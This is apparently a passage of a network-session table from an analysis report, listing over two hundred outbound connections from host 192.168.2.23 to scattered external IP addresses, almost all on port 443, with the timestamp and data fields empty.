                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10584192.168.2.236075243.242.131.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10585192.168.2.2357394212.85.71.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10586192.168.2.2338568107.169.71.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10587192.168.2.2340122130.187.161.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10588192.168.2.233617237.201.2.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10589192.168.2.2339438162.247.176.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10590192.168.2.234888219.167.63.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10591192.168.2.2346640117.230.111.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10592192.168.2.2339678114.182.99.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10593192.168.2.233948840.235.95.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10594192.168.2.2351234181.67.51.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10595192.168.2.2350968155.103.182.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10596192.168.2.234813227.163.25.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10597192.168.2.235339654.226.175.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10598192.168.2.233586249.232.168.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10599192.168.2.2337038148.152.188.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10600192.168.2.2340740113.184.58.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10601192.168.2.235660453.110.60.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10602192.168.2.233295479.193.158.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10603192.168.2.233593632.196.28.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10604192.168.2.23488761.166.150.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10605192.168.2.233449068.135.113.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10606192.168.2.2358814115.36.216.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10607192.168.2.233372686.22.16.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10608192.168.2.235641451.231.178.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10609192.168.2.2338544176.235.70.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10610192.168.2.2345326205.43.58.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10611192.168.2.235045698.120.90.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10612192.168.2.2336548129.181.212.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10613192.168.2.2348022100.201.130.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10614192.168.2.234967476.101.171.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10615192.168.2.2353484218.121.198.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10616192.168.2.2357938164.162.156.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10617192.168.2.233691435.99.29.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10618192.168.2.2334208132.139.94.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10619192.168.2.23531301.57.133.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10620192.168.2.2359198153.152.136.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10621192.168.2.235978462.70.166.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10622192.168.2.233368227.95.60.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10623192.168.2.2359676180.161.163.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10624192.168.2.235872038.219.21.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10625192.168.2.233552686.150.113.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10626192.168.2.2360712152.46.113.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10627192.168.2.2349754203.244.110.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10628192.168.2.234370645.161.199.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10629192.168.2.2344660212.89.240.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10630192.168.2.236049488.46.9.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10631192.168.2.233316292.88.79.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10632192.168.2.2334174202.202.119.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10633192.168.2.2336784178.209.10.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10634192.168.2.2349130183.134.197.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10635192.168.2.235342891.29.129.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10636192.168.2.2356142194.102.40.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10637192.168.2.2334452146.31.157.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10638192.168.2.235851220.206.239.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10639192.168.2.2339464145.1.5.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10640192.168.2.234311683.42.225.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10641192.168.2.2335734177.237.171.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10642192.168.2.235517617.50.3.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10643192.168.2.23561648.230.101.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10644192.168.2.233750443.34.112.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10645192.168.2.2335642113.133.243.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10646192.168.2.23532308.93.179.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10647192.168.2.2336070164.178.86.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10648192.168.2.233621884.76.145.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10649192.168.2.234639639.139.247.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10650192.168.2.234953435.83.181.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10651192.168.2.235505418.146.28.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10652192.168.2.2349388129.209.252.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10653192.168.2.2333326129.157.111.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10654192.168.2.2341212187.21.167.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10655192.168.2.2350782107.10.96.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10656192.168.2.2334118123.48.201.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10657192.168.2.2333224199.21.108.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10658192.168.2.2356830151.112.171.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10659192.168.2.2360502149.174.64.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10660192.168.2.234564879.248.94.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10661192.168.2.235285832.174.145.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10662192.168.2.235200059.150.128.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10663192.168.2.234523483.164.194.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10664192.168.2.235518447.195.195.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10665192.168.2.235762446.202.122.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10666192.168.2.2339624135.3.67.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10667192.168.2.2334728176.86.74.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10668192.168.2.2347042103.246.65.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10669192.168.2.234159225.160.142.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10670192.168.2.234901498.250.173.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10671192.168.2.235442270.208.230.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10672192.168.2.2351450198.154.72.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10673192.168.2.2335166133.138.53.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10674192.168.2.233683081.136.26.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10675192.168.2.2350994139.158.190.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10676192.168.2.23565001.160.5.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10677192.168.2.235608850.233.155.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10678192.168.2.2333742170.139.35.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10679192.168.2.2350860152.237.157.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10680192.168.2.233893232.91.76.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10681192.168.2.234240886.106.96.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10682192.168.2.235138435.180.236.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10683192.168.2.233948083.168.70.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10684192.168.2.233912276.152.225.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10685192.168.2.234629494.114.72.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10686192.168.2.2339132194.18.97.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10687192.168.2.235501412.55.144.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10688192.168.2.2332772110.10.208.2128080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10689192.168.2.233993071.83.18.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10690192.168.2.2347042179.121.22.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10691192.168.2.2341656120.43.176.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10692192.168.2.234288019.192.226.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10693192.168.2.234464435.46.122.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10694192.168.2.2355876139.75.255.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10695192.168.2.2333992137.194.48.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10696192.168.2.2338902106.242.139.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10697192.168.2.2346372171.24.242.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10698192.168.2.2358580135.121.252.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10699192.168.2.235506432.227.246.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10700192.168.2.235279093.110.141.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10701192.168.2.2356922110.216.178.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10702192.168.2.2349786186.215.211.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10703192.168.2.2352052126.121.89.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10704192.168.2.2340298106.81.233.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10705192.168.2.235112034.173.108.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10706192.168.2.2353372151.44.8.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10707192.168.2.2353624179.3.146.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10708192.168.2.23541989.36.135.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10709192.168.2.2337696177.131.133.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10710192.168.2.235865284.219.155.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10711192.168.2.2354336223.101.26.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10712192.168.2.2351354216.199.210.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10713192.168.2.2359618131.81.32.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10714192.168.2.235731488.52.42.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10715192.168.2.235374885.24.63.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10716192.168.2.2340204203.85.235.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10717192.168.2.2344932202.58.141.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10718192.168.2.234174272.216.146.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10719192.168.2.2356696219.199.164.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10720192.168.2.2335906135.23.165.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10721192.168.2.2355474202.171.47.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10722192.168.2.2340190132.71.94.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10723192.168.2.2360186122.109.190.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10724192.168.2.2351890128.119.161.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10725192.168.2.2360678169.156.188.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10726192.168.2.2333396108.82.47.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10727192.168.2.2360450173.30.134.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10728192.168.2.2351952142.128.169.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10729192.168.2.2360004203.38.164.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10730192.168.2.2351320191.68.136.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10731192.168.2.2353110143.158.6.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10732192.168.2.2335914193.213.77.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10733192.168.2.2354706131.80.106.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10734192.168.2.2335792105.200.112.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10735192.168.2.2341288164.110.253.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10736192.168.2.2338604208.154.222.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10737192.168.2.233508277.15.147.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10738192.168.2.2360662117.252.148.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10739192.168.2.2340968166.165.194.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10740192.168.2.2360526128.32.102.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10741192.168.2.233890048.160.66.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10742192.168.2.2346478204.56.128.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10743192.168.2.2339466218.176.70.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10744192.168.2.2341764188.95.15.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10745192.168.2.2360114150.230.115.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10746192.168.2.2352254179.164.116.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10747192.168.2.2357036144.121.21.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10748192.168.2.2350806168.5.207.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10749192.168.2.233537668.211.52.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10750192.168.2.234630445.128.147.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10751192.168.2.2349078176.181.217.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10752192.168.2.2347748164.148.230.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10753192.168.2.234688275.137.125.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10754192.168.2.234333614.209.58.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10755192.168.2.2344902168.53.134.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10756192.168.2.2340380104.110.248.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10757192.168.2.2349224195.218.149.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10758192.168.2.2335042132.172.92.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10759192.168.2.2346404206.129.196.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10760192.168.2.236068672.32.225.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10761192.168.2.2359278140.67.206.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10762192.168.2.2341170167.160.149.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10763192.168.2.233805031.207.130.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10764192.168.2.2344166177.181.201.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10765192.168.2.2347540116.11.36.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10766192.168.2.2353534131.181.45.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10767192.168.2.2355296130.197.17.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10768192.168.2.234662038.209.23.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10769192.168.2.234921644.79.78.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10770192.168.2.2337084223.197.96.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10771192.168.2.2340344219.99.77.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10772192.168.2.2345520136.251.245.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10773192.168.2.2345594169.105.1.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10774192.168.2.2348908183.238.34.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10775192.168.2.23541588.195.100.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10776192.168.2.2345390144.54.142.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10777192.168.2.2344450137.167.21.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10778192.168.2.233301864.110.32.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10779192.168.2.235656040.77.95.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10780192.168.2.233331051.249.207.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10781192.168.2.234850294.250.160.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10782192.168.2.2347796101.23.109.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10783192.168.2.2339514115.28.62.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10784192.168.2.234824687.198.227.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10785192.168.2.235438414.125.113.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10786192.168.2.233654686.152.31.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10787192.168.2.2347132174.141.97.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10788192.168.2.2359690188.70.228.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10789192.168.2.2342696111.11.230.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10790192.168.2.234905475.172.197.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10791192.168.2.23470789.228.115.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10792192.168.2.234461425.110.160.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10793192.168.2.2337492203.186.57.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10794192.168.2.235503268.115.134.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10795192.168.2.235955640.107.124.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10796192.168.2.2338546128.228.32.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10797192.168.2.236005061.22.78.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10798192.168.2.2352984146.246.235.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10799192.168.2.2354264159.253.26.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10800192.168.2.2347572126.38.199.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10801192.168.2.235762249.34.25.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10802192.168.2.2353440122.249.172.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10803192.168.2.2335630198.61.123.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10804192.168.2.234897414.176.65.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10805192.168.2.2348346204.110.176.152443
